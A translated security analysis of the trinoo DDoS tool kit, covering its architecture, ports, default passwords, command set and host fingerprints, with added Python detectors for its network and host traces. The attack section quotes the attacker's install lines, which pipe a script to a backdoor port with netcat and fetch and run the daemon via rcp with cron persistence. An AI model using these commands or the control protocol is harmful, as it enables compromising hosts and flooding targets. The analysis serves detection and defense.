Linux hacking tools: Trinoo, an analysis of a DDoS attack tool

This article is an analysis of the master/slave structure of the "trinoo" distributed denial of service attack tool kit.

Trinoo daemon binaries were first found on a number of Solaris 2.x hosts that had been compromised through buffer overflow vulnerabilities in the RPC services "statd", "cmsd" and "ttdbserverd". For details of these vulnerabilities see CERT Incident Note IN-99-04:

http://www.cert.org/incident_notes/IN-99-04.html

The trinoo daemon initially appeared together with a UDP-based remote command shell with its own access control, and probably also with a sniffer that logged automatically.

While examining the tool kit, we captured an attacker installing a trinoo network and obtained some of the source code. The in-depth analysis below is based on that captured source code.

Any modification of the source code, such as prompts, passwords, commands, TCP/UDP port numbers, supported attack methods, signature strings or specific functions, can produce results different from those described in this article.

The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0; the master server was compiled and run on Red Hat Linux 6.0. Both the master server and the daemon can probably be used on other similar platforms.

A trinoo network may consist of hundreds or even thousands of compromised Internet hosts. These hosts have probably also been fitted with various "back doors" to make re-entry into the system easier.

On August 17, 1999 a trinoo network of at least 227 hosts (114 of them on Internet2) attacked a single host at the University of Minnesota, and that host's network was knocked out for more than two days. During the investigation of that attack at least 16 other hosts were found to have been attacked, including some outside the United States. (See Appendix D for the report on that trinoo attack.)


The course of an attack

A typical attack probably proceeds like this:

1) A stolen account is used to compile the various scanning tools, attack tools (such as buffer overflow programs), rootkits and sniffers, trinoo daemons and master servers, lists of compromised hosts, target host lists and so on. This is usually a large system with many users, lax administration and a high-speed connection (for file transfers).

2) A wide-ran​ging network scan is then run to identify potential intrusion targets. The most likely targets are hosts with remotely exploitable buffer overflow vulnerabilities, such as wu-ftpd or the RPC services (cmsd, statd, ttdbserverd, amd). The preferred operating systems are Sun Solaris 2.x and Linux, so that ready-made rootkits and back doors can be used; other systems may also be kept and recorded for use as tools.

3) A list of compromised hosts is built from the results of the intrusion attacks, either by listening on a TCP port (usually 1524, "ingreslock") and connecting to it to determine whether the intrusion script succeeded, or by having the script send an e-mail to a free web-mail account confirming that the host has been compromised.

Once the intrusions are complete, the list of "owned" hosts is used to place back doors, sniffers, trinoo daemons or trinoo master servers.

4) From the list of compromised systems, hosts that meet the needs of the trinoo network are selected, and pre-compiled trinoo daemons are placed on them.

5) Finally, a DoS attack script is run. From the list of compromised hosts above it generates a further script that installs the daemons automatically, in the background and as fast as possible. The script uses "netcat" to send a shell script to port 1524/tcp on each hacked host:

./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
...


The "trin.sh" script produces the following output:

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"


Checking crontab files from time to time is an easy way to monitor whether a host has been compromised by trinoo.

On other systems another method was found: the daemon was renamed "xterm" and then run through a script:

cd /var/adm/.1
PATH=.:$PATH
export PATH
xterm 1> /dev/null 2>&1

It is entirely possible to build a trinoo network by running such scripts on the daemon hosts.

A more subtle method would be to have the trinoo daemon or master server start only at a given wake-up time and then open its TCP or UDP port and listen.

The automation of the entire installation process lets an attacker build a denial of service network from a large number of compromised hosts in a very short time.

6) Optionally, a rootkit is installed on the system to hide the attack programs, files and network connections. This matters most on the master server systems, since they are the core of the trinoo network. (Note: in many cases the master server was installed on an Internet service provider's domain name server. The large volume of DNS traffic and TCP/UDP connections on such a host helps to hide the trinoo network's connections, attack processes and files. Also, unless the presence of the denial of service tool on the name server can be established with certainty, system administrators are generally reluctant to interrupt the service to do a security check.)

Rootkits may also be used to install sniffers on the system, such as "hunt" (a TCP/IP session monitor), which can directly eavesdrop on the details of network communication. This removes the need to re-enter the system through a remote buffer overflow. :)

For more information on rootkits see:

http://staff.washington.edu/dittrich/faq/rootkits.faq


Network structure

A trinoo network is made up of master servers (master.c) and trinoo daemons (ns.c). A typical trinoo network is structured as follows:

The attacker controls one or more "master" servers, and each master server controls a number of "daemons" (which we may call broadcast hosts, "Bcast"). On receiving a command, all the daemons send attack packets at the same time to one or more target systems.

How does trinoo achieve this? The attacker establishes a TCP connection to the master server with the "telnet" protocol, supplies a password and sends commands, which produces a large-scale, high-volume, concurrent denial of service attack.

Communication ports

Attacker to master server: 27665/TCP
Master server to daemon:   27444/UDP
Daemon to master server:   31335/UDP

Remote control of the trinoo master server is done over a TCP connection to port 27665/TCP. Once connected, the user must supply the correct password ("betaalmostdone"). If a second connection is made while one is already authenticated, a warning message containing the IP address of the new connection is sent to the connected host (the IP address supplied appears to be wrong, but the warning is still sent). This feature is clearly intended to give the attacker enough time to clear traces before leaving.

Communication from the master server to the trinoo daemon is over port 27444/UDP. The command line format is:

arg1 password arg2

The default password is "l44adsl"; only command lines containing the password sub-string "l44" are executed.

Communication from the trinoo daemon to the master server is over port 31335/UDP.


When the daemon starts, it sends the initialization string "*HELLO*" to the master server. The master server (shown here as captured with "sniffit") records this and maintains a list of active daemons:

UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
45 E 00. 00. 23 # B1. 5D ] 40 @ 00. F8. 11. B9. 27. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6C l 7A z 67 g 00. 0F. 06. D4. 2A * 48 H 45 E 4C L
4C L 4F O 2A *

If the master server sends the "png" command to a daemon on port 27444/UDP, the daemon replies on port 31335/UDP with the string "PONG" to the host that sent the "png" command:

UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 ' 1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l

UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
45 E 00. 00. 20 13. 81. 40 @ 00. F8. 11. 57 W 07. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6F o 7A z 67 g 00. 0C. 4E N 24 $ 50 P 4F O 4E N 47 G


Password protection

Both the master server and the daemon are password protected, to prevent system administrators (or other hacker groups) from taking control of the trinoo network. The passwords are encrypted with the crypt() function. This is a symmetric encryption method. The encrypted passwords are compiled into the master server and daemon binaries, and the passwords are transmitted over the network in clear text for comparison (the current version does not encrypt the communication session, so it is not difficult to intercept the clear-text password in the TCP control session to the master server).

When the master server is started, it prints a prompt and waits for a password. If the password is wrong the program exits; if it is correct a prompt is printed, a child process is started to run in the background, and the parent exits:

# ./master
?? wrongpassword
#
...
# ./master
?? gOrave
trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24]
#

Similarly, when connecting to the remote command port (27665/TCP), a password must be entered:

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
kwijibo
Connection closed by foreign host.
...
attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

Certain commands sent from the master server to the trinoo daemons are also password protected. These passwords are again sent in clear text between the master server and the daemon.

The default passwords are:

"l44adsl"         trinoo daemon password
"gOrave"          trinoo master server startup password (prompt "??")
"betaalmostdone"  trinoo master server remote interface password
"killme"          trinoo master server password for the "mdie" control command


Master server commands

The trinoo master server supports the following commands:

die        Shut down the master server.

quit       Log off the master server.

mtimer N   Set the DoS timer to N seconds. N can range from 1 to 1999 seconds. If N < 1 or N > 2000, the default value of 500 is used.

mdie pass  If the password check passes, stop all broadcast (Bcast) hosts. The command "d1e l44adsl" is sent to each broadcast host to make it stop. This command requires a separate password.

mping      Send a PING command ("png l44adsl") to every active broadcast host.

mdos       Send a multiple-target DoS command ("xyz l44adsl 123:ip1:ip2:ip3") to each broadcast host.

info       Print version and compile information, for example:
           This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c
           Compiled 15:08:41 Aug 16 1999

msize      Set the size of the packet data buffer used for DoS attacks.

nslookup host   Run a name lookup on the specified host name.

killdead   Try to weed out dead broadcast hosts. First the command "shi l44adsl" is sent to all known broadcast hosts (any daemon that is active replies with the initialization string "*HELLO*"). The broadcast host list file is then renamed (with the "-b" suffix) so that it is re-initialized as the "*HELLO*" packets are received.

usebackup  Switch to the backup broadcast host file created by the "killdead" command.

bcast      List all active broadcast hosts.

help [cmd] Print the list of commands, or help on the specified command.

mstop      Try to stop a DoS attack (not yet implemented, but listed by the help command).


Daemon commands

The trinoo daemon supports the following commands:

aaa pass IP    Attack the specified IP address. For a fixed period of time (default 120 seconds, or 1-1999 seconds as set by the "bbb" command) UDP packets are sent to random UDP ports (0-65534) on the specified IP address. The packet size is set by the "rsz" command (default 1000 bytes).

rsz N          Set the DoS attack buffer size to N bytes. (The trinoo daemon allocates a buffer of this size with malloc() and then sends its random contents as the attack payload.)

xyz pass 123:ip1:ip2:ip3   Multiple DoS attack. Like the "aaa" command, but attacks several IP addresses at the same time.


Tool characteristics

The most common way of installing the trinoo daemon is to add a crontab entry so that the daemon is started every minute. Check crontab files for an entry like the following:

* * * * * /usr/sbin/rpc.listen

The master server program creates a file containing the list of broadcast hosts (the default file name is "..."). If "killdead" is used, the "shi" command is sent to all daemons listed in "..." so that they all send the initialization string "*HELLO*" to the master server. The list file is then renamed (to "...-b" by default), and a new list file is generated from the daemons that send back a "*HELLO*" string (i.e. that are active).

The source code ("master.c") contains the following lines:

...
/* crypt key encrypted with the key 'bored' (so hex edit cannot get key easily?)
   Comment out for no encryption... */

#define CRYPTKEY "ZsoTN.cq4X31"
...

If CRYPTKEY is defined when the program is compiled, the IP addresses of the broadcast hosts are encrypted with the Blowfish algorithm:

# ls -l ... ...-b
-rw-------   1 root     root           25 Sep 26 14:46 ...
-rw-------   1 root     root           50 Sep 26 14:30 ...-b
# cat ...
JPbUc05Swk/0gMvui18BrFH/
# cat ...-b
aE5sK0PIFws0Y0EhH02fLVK.
JPbUc05Swk/0gMvui18BrFH/


Assuming a rootkit has not been used to hide the processes, the master server shows the following network socket fingerprint (of course the program name and path may vary):

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
...
udp        0      0 *:31335                 *:*
...
# lsof | egrep ":31335|:27665"
master    1292 root    3u  inet   2460       UDP *:31335
master    1292 root    4u  inet   2461       TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
master  1292 root  cwd    DIR    3,1    1024  14356 /tmp/...
master  1292 root  rtd    DIR    3,1    1024      2 /
master  1292 root  txt    REG    3,1   30492  14357 /tmp/.../master
master  1292 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
master  1292 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
master  1292 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
master  1292 root    0u   CHR    4,1           2967 /dev/tty1
master  1292 root    1u   CHR    4,1           2967 /dev/tty1
master  1292 root    2u   CHR    4,1           2967 /dev/tty1
master  1292 root    3u  inet   2534            UDP *:31335
master  1292 root    4u  inet   2535            TCP *:27665 (LISTEN)

A system running the daemon shows the following fingerprint:

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
...
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
...
# lsof | egrep ":27444"
ns        1316 root    3u  inet   2502       UDP *:27444
# lsof -p 1316
COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
ns      1316 root  cwd    DIR    3,1    1024 153694 /tmp/...
ns      1316 root  rtd    DIR    3,1    1024      2 /
ns      1316 root  txt    REG    3,1    6156 153711 /tmp/.../ns
ns      1316 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
ns      1316 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
ns      1316 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
ns      1316 root    0u   CHR    4,1           2967 /dev/tty1
ns      1316 root    1u   CHR    4,1           2967 /dev/tty1
ns      1316 root    2u   CHR    4,1           2967 /dev/tty1
ns      1316 root    3u  inet   2502            UDP *:27444
ns      1316 root    4u  inet   2503            UDP *:1024


Defense

Of course, the best defense is to prevent the intrusions and root-level compromises in the first place, so that trinoo master servers or daemons never get installed on your systems. In an ideal world all systems would be fully patched, secure and monitored, intrusion detection systems and firewalls would detect and reject the attack packets, and I would be a millionaire living six months of the year on Barry Island and six months in the French Alps. :) In the real world none of this is achievable (at least not in the foreseeable future).

If a number of trinoo daemons may have been installed and are running on your network, ready to launch DoS attacks on other systems, how do you find and stop them?

Because these programs use high-numbered UDP ports for both communication and attacks, blocking this traffic directly is very difficult (though not impossible) without also affecting legitimate programs that use high-numbered UDP ports.

Probably the simplest check for the presence of trinoo master servers and daemons is to watch all UDP packets on the shared Ethernet segment for the master/daemon communication signatures described in this article. Unfortunately, this activity is only likely to be noticed during or after a DoS attack on a target host.

If a trinoo daemon is suspected to be carrying out an attack, running "truss" on the daemon on a Solaris system produces output like the following:


...
getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)      = 0
getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)      (sleeping...)
getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)      = 0
time()                                             = 938385467
open("/dev/udp", O_RDWR)                           = 5
ioctl(5, I_PUSH, "sockmod")                        = 0
ioctl(5, I_STR, 0xEFFFF748)                        = 0
ioctl(5, I_SETCLTIME, 0xEFFFF7FC)                  = 0
ioctl(5, I_SWROPT, 0x00000002)                     = 0
sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC)   = 0
ioctl(5, I_STR, 0xEFFFF660)                        = 0
sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8)   = 0
sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0)     = 0
ioctl(5, I_STR, 0xEFFFF548)                        = 0
sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000)   = 0
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)               = 0
time()                                             = 938385467
...


When a single target is attacked, monitoring the network traffic with "tcpdump" gives the following output:

# tcpdump ip host 192.168.0.1
...
... > 192.168.0.1.27444: udp 25
... > 216.160.XX.YY.16838: udp 4 (DF)
... > 216.160.XX.YY.5758: udp 4 (DF)
... > 216.160.XX.YY.10113: udp 4 (DF)
... > 216.160.XX.YY.17515: udp 4 (DF)
... > 216.160.XX.YY.31051: udp 4 (DF)
... > 216.160.XX.YY.5627: udp 4 (DF)
... > 216.160.XX.YY.23010: udp 4 (DF)
... > 216.160.XX.YY.7419: udp 4 (DF)
... > 216.160.XX.YY.16212: udp 4 (DF)
... > 216.160.XX.YY.4086: udp 4 (DF)
... > 216.160.XX.YY.2749: udp 4 (DF)
... > 216.160.XX.YY.12767: udp 4 (DF)
... > 216.160.XX.YY.9084: udp 4 (DF)
... > 216.160.XX.YY.12060: udp 4 (DF)
... > 216.160.XX.YY.32225: udp 4 (DF)
...

Deficiencies and weaknesses

The first weakness is the use of the crypt() function to encrypt the passwords, combined with the fact that the communication between the master server and the daemons, and the prompt strings they return, can be intercepted.

This lets you identify the presence of a master server or daemon, determine whether the default passwords given in this article are in use, and possibly, by cracking the passwords, gain some (or all) control of the trinoo network.

However, if the attacker has cleverly modified the source code, you may have to crack the passwords, or use a hex/ASCII editor to change the command byte sequences in the binary, to obtain the host lists from the master program or daemon.

If you are lucky and the source code has not been modified, you can search the installed files for the default strings to find the passwords:


# strings - ns
...
socket
bind
recvfrom
%s %s %s
aIf3YWfOhw.V.               <=== crypt() encrypted password "l44adsl"
PONG
*HELLO*
...
# strings - master
...
---v
v1.07d2+f3+c
trinoo %s
l44adsl                     <=== clear text version of daemon password
sock
0nm1VNMXqRMyM               <=== crypt() encrypted password "gOrave"
10:09:24
Sep 26 1999
trinoo %s [%s:%s]
bind
read
*HELLO*
ZsoTN.cq4X31                <=== CRYPTKEY
bored
NEW Bcast - %s
PONG
PONG %d Received from %s
Warning: Connection from %s
beUBZbLtK7kkY               <=== crypt() encrypted password "betaalmostdone"
trinoo %s..[rpm8d/cb4Sx/]
...
DoS: usage: dos
DoS: Packeting %s.
aaa %s %s
mdie
ErDVt6azHrePE               <=== crypt() encrypted password for "mdie" command
mdie: Disabling Bcasts.
d1e %s
mdie: password?
...


The second weakness is that the daemon password is sent in clear text over the network. Assuming you know the UDP port numbers used between the master server and the clients (daemons), you can use "sniffit", "ngrep", "tcpdump" or another network monitoring program to intercept the UDP packets and read the password (Appendix A is an example using "ngrep").

For example, the following "png" command packet was intercepted with "sniffit":

UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 ' 1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l
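The following is an added Python example (not code from the original article) that makes the captures above and the sniffing advice in the Defense section concrete: it parses sniffit's hex/ASCII dump format, decodes the IPv4 and UDP headers, and checks each datagram against the trinoo ports and strings described in this article. The three dumps embedded below are copied from the article's own captures; the port table, marker strings, command words and the "l44" sub-string rule are taken from the article's description.

```python
import re
import struct

# Fixed ports of an unmodified trinoo network, as documented in the article.
TRINOO_PORTS = {
    27665: "attacker -> master (TCP control)",
    27444: "master -> daemon (UDP commands)",
    31335: "daemon -> master (UDP replies)",
}
# Payload strings of the unmodified tool: reply markers and daemon command words.
TRINOO_MARKERS = (b"*HELLO*", b"PONG")
TRINOO_DAEMON_CMDS = (b"png ", b"d1e ", b"shi ", b"aaa ", b"bbb ", b"rsz ", b"xyz ")

# sniffit prints each byte as two hex digits followed by its ASCII rendering:
# "45 E" for a printable byte, "00." (or "00 .") for a non-printable one.
# A data byte is therefore a token of exactly two hex digits not followed by
# another letter or digit; single-character ASCII annotations never match.
_HEX_BYTE = re.compile(r"^([0-9A-Fa-f]{2})(?![0-9A-Za-z])")


def sniffit_dump_to_bytes(dump):
    """Recover the raw packet bytes from a sniffit hex/ASCII dump."""
    raw = bytearray()
    for line in dump.splitlines():
        if line.startswith("UDP Packet ID"):  # sniffit's header line, not data
            continue
        for tok in line.split():
            m = _HEX_BYTE.match(tok)
            if m:
                raw.append(int(m.group(1), 16))
    return bytes(raw)


def parse_ipv4_udp(pkt):
    """Decode the IPv4 and UDP headers; return addresses, ports and payload."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if pkt[9] != 17:
        raise ValueError("IP protocol %d is not UDP" % pkt[9])
    if total_len != len(pkt):
        raise ValueError("IP length %d but dump has %d bytes" % (total_len, len(pkt)))
    sport, dport, ulen = struct.unpack("!HHH", pkt[ihl:ihl + 6])
    return {
        "src": ".".join(str(b) for b in pkt[12:16]),
        "dst": ".".join(str(b) for b in pkt[16:20]),
        "sport": sport,
        "dport": dport,
        "payload": pkt[ihl + 8:ihl + ulen],
    }


def classify_trinoo(info):
    """Match a decoded UDP datagram against trinoo's ports and strings."""
    findings = []
    for port in (info["sport"], info["dport"]):
        if port in TRINOO_PORTS:
            findings.append("port %d: %s" % (port, TRINOO_PORTS[port]))
    payload = info["payload"]
    if payload in TRINOO_MARKERS:
        findings.append("marker string %s" % payload.decode("ascii"))
    elif payload[:4] in TRINOO_DAEMON_CMDS:
        findings.append("daemon command %r" % payload.decode("ascii", "replace"))
        # The daemon executes any command whose password contains "l44".
        if b"l44" in payload:
            findings.append("default daemon password sub-string 'l44' present")
    return findings


def scan_dumps(dumps):
    """Map each named sniffit dump to its list of trinoo findings."""
    return {name: classify_trinoo(parse_ipv4_udp(sniffit_dump_to_bytes(d)))
            for name, d in dumps.items()}


# Sample input: the three sniffit captures shown in the article.
HELLO_DUMP = """UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335
45 E 00. 00. 23 # B1. 5D ] 40 @ 00. F8. 11. B9. 27. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6C l 7A z 67 g 00. 0F. 06. D4. 2A * 48 H 45 E 4C L
4C L 4F O 2A *
"""
PNG_DUMP = """UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
45 E 00. 00. 27 ' 1A. AE. 00. 00. 40 @ 11. 47 G D4. 0A. 00. 00. 01.
C0. A8. 00. 01. 04. 00. 6B k 34 4 00. 13. 2F / B7. 70 p 6E n 67 g 20
6C l 34 4 34 4 61 a 64 d 73 s 6C l
"""
PONG_DUMP = """UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335
45 E 00. 00. 20 13. 81. 40 @ 00. F8. 11. 57 W 07. C0. A8. 00. 01.
0A. 00. 00. 01. 80. 6F o 7A z 67 g 00. 0C. 4E N 24 $ 50 P 4F O 4E N 47 G
"""

if __name__ == "__main__":
    for name, found in scan_dumps({"hello": HELLO_DUMP, "png": PNG_DUMP,
                                   "pong": PONG_DUMP}).items():
        print("%-5s %s" % (name, found))
```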


As mentioned earlier, the trinoo master server's "mdie" command is password protected. There are several ways to break it.

If you can find the encrypted password with the UNIX "strings" command, you may be able to crack it with a password cracking tool (see Appendix C). Although this may take a very long time (if the password is a strong one), it is feasible. (On a Pentium II it took us less than 30 seconds to crack the "mdie" command password "killme".)

You could also try to sniff the password on the network between the attacker and the master server, but if the command that needs the password is rarely (or never) executed, this will be extremely difficult.

You may have better luck intercepting the daemon password, since most commands require it. It may show up on the daemon's network segment or on the master server's segment (and the two may be completely different kinds of network). Sniffing on the daemon side is preferable, because there are many more daemons than master servers. Another reason is that many master servers were found running on primary domain name servers, where the volume of high-numbered UDP traffic is much greater than on a daemon host, which makes sniffing much harder. Also, once you find a site running several daemons, it usually means you can be certain the systems have been compromised. :)

Once you have found a daemon, you can obtain the list of master server IP addresses (via the "strings" command). You should immediately contact the administrators of those sites in detail so that those hosts can be checked for intrusion. (If the attacker used a rootkit, you may need to consult a professional security company or expert.)

If you find a master server, its list file gives the IP addresses of all its daemons (if the list has not been encrypted). If the file is encrypted, you either need the key compiled into the program to decrypt it (the encryption algorithm is Blowfish), or you need to take control of the master server and use the "bcast" command to obtain the list of active daemons.

If you find an active session with a master server (the session is a "telnet" TCP session), you can take over the session with the "hunt" program and run commands. Without the "mdie" command password you cannot directly stop all the daemons, but you can use the "bcast" command to obtain the list of all daemons. (Since the list may be very long, it is recommended to script this command.)

Once you know the IP addresses of all the daemons and the daemon password, you can send UDP packets containing the correct command string to any suspected trinoo daemon. Tools such as LibNet, Spak and the Perl Net::RawIP library can be used to construct and send such UDP packets. (The Perl script "trinot", which uses Net::RawIP, is dedicated to this task; see Appendix B.)

Since a typical installation adds a crontab entry that restarts the daemon every minute, you should remove those entries completely to prevent the daemon from being restarted.

Sniffing your network for UDP packets containing the strings "*HELLO*", "PONG" or any of the other signature strings can also show that daemons have been installed on the network. Note that this applies to the unmodified version of the source code. The following is an example of a successful capture with "ngrep":


# ngrep -i -x "*hello*|pong" udp
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and ( udp )
match: *hello*|pong
...
#
U ... -> 10.0.0.1:31335
  2a 48 45 4c 4c 4f 2a                                  *HELLO*
###
U ... -> 10.0.0.1:31335
  50 4f 4e 47                                           PONG
U ... -> 10.0.0.1:31335
  50 4f 4e 47                                           PONG
U ... -> 10.0.0.1:31335
  50 4f 4e 47                                           PONG
...


Even if trinoo itself had no weaknesses, the trinoo network would still have weak points that can be found.

As mentioned earlier, some systems use a crontab entry to run the daemon; this is a very clear marker.

The automatic installation script of the trinoo network uses the Berkeley "rcp" command. Monitoring the network for "rcp" connections (514/TCP) to external IP addresses allows quick detection. (Note: the "rcp" used by the script requires a trust relationship between the hosts, usually a "+ +" entry in the user's ~/.rhosts file. Checking that file can immediately reveal a possible system intrusion.)
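The host-side indicators from the "Tool characteristics" and "Defense" sections (the every-minute crontab entry, the "+ +" entry in ~/.rhosts, and the listening ports in the netstat fingerprint) can be checked mechanically. The following is an added Python example, not code from the article; the crontab, .rhosts and netstat texts it inspects are constructed samples modelled on the article's listings, and the port table comes from the article.

```python
import re

# Listening ports from the article's netstat/lsof fingerprints.
TRINOO_LISTEN_PORTS = {
    27665: "trinoo master control port (TCP)",
    31335: "trinoo master, daemon replies (UDP)",
    27444: "trinoo daemon command port (UDP)",
}


def audit_crontab(text):
    """Flag crontab entries scheduled every minute, trinoo's usual way of
    keeping the daemon alive ('* * * * * /usr/sbin/rpc.listen')."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # minute hour dom month dow command
        if len(fields) == 6 and all(f == "*" for f in fields[:5]):
            hits.append("every-minute cron job: %s" % fields[5])
    return hits


def audit_rhosts(text):
    """Flag the '+ +' wildcard trust entry the install script needs for rcp."""
    return ["wildcard trust entry '+ +' in .rhosts"
            for line in text.splitlines() if line.split() == ["+", "+"]]


def audit_netstat(text):
    """Match listening sockets in 'netstat -a --inet' output to trinoo ports."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("tcp", "udp"):
            continue
        m = re.search(r":(\d+)$", parts[3])  # local address, e.g. "*:27665"
        if m and int(m.group(1)) in TRINOO_LISTEN_PORTS:
            port = int(m.group(1))
            hits.append("%s port %d open: %s" % (parts[0], port, TRINOO_LISTEN_PORTS[port]))
    return hits


def audit_host(crontab_text, rhosts_text, netstat_text):
    """Run all three checks and return the findings per source."""
    return {
        "crontab": audit_crontab(crontab_text),
        "rhosts": audit_rhosts(rhosts_text),
        "netstat": audit_netstat(netstat_text),
    }


# Constructed sample input modelled on the article's listings.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate
* * * * * /usr/sbin/rpc.listen
"""
SAMPLE_RHOSTS = "+ +\n"
SAMPLE_NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:22                    *:*                     LISTEN
tcp        0      0 *:27665                 *:*                     LISTEN
udp        0      0 *:31335                 *:*
"""

if __name__ == "__main__":
    for source, findings in audit_host(SAMPLE_CRONTAB, SAMPLE_RHOSTS, SAMPLE_NETSTAT).items():
        print("%-8s %s" % (source, findings or "clean"))
```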


(For further analysis of trinoo see Appendix E, "More trinoo detection methods", prepared by George Weaver of Pennsylvania State University and David Brumley of Stanford University.)

Appendix A: "ngrep" network session capture

The following is an example of an attack session captured with "ngrep":


# ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and ( tcp port 27665 or udp port 31335 or udp port 27444 )
match: .*
#
U 192.168.0.1:... -> 10.0.0.1:31335
  2a 48 45 4c 4c 4f 2a                                  *HELLO*
#
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  ff f4 ff fd 06                                        .....
######
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a       betaalmostdone..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66       trinoo v1.07d2+f
  33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53       3+c..[rpm8d/cb4S
  78 2f 5d 0a 0a 0a                                     x/]...
##
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
###
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  62 63 61 73 74 0d 0a                                  bcast..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  4c 69 73 74 69 6e 67 20 42 63 61 73 74 73 2e 0a       Listing Bcasts..
  0a                                                    .
###
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  31 39 32 2e 31 36 38 2e 30 2e 31 2e 20 20 20 0a       192.168.0.1.   .
